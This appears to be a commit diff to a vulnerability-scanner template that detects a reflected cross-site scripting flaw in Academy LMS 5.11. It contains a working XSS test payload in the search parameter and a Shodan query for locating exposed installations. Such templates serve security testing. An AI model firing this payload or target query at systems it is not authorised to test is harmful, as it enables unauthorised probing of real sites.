matcher-update

added additional data to keep the template uniform

vulnerabilities/other/academy-lms-xss.yaml

@@ -1,32 +1,33 @@
-id: alm
+id: academy-lms-xss
 
 info:
-  name: Academy Learning Management System v5.1.1 - Cross-Site Scripting
+  name: Academy LMS 5.11 Cross Site Scripting
   author: arafatansari
   severity: medium
   description: |
     Academy Learning Management System contains a reflected cross-site scripting vulnerability via the Search parameter.
   reference:
     - https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
-   metadata:
+    - https://vulners.com/packetstorm/PACKETSTORM:170514
+  metadata:
     shodan-query: http.html:"Academy LMS"
     verified: "true"
-  tags: xss,lms
+  tags: xss,lms,academy
 
 requests:
-  - raw:
+  - method: GET
-      - |
+    path:
-        GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+      - "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-        Host: {{Hostname}}
-        
 
     matchers-condition: and
     matchers:
-      - type: status
+      - type: word
-        status:
-          - 200
-
-  - type: word
         part: body
         words:
           - '<script>alert(document.domain)</script>'
+          - 'Academy LMS'
+        condition: and
+
+      - type: status
+        status:
+          - 200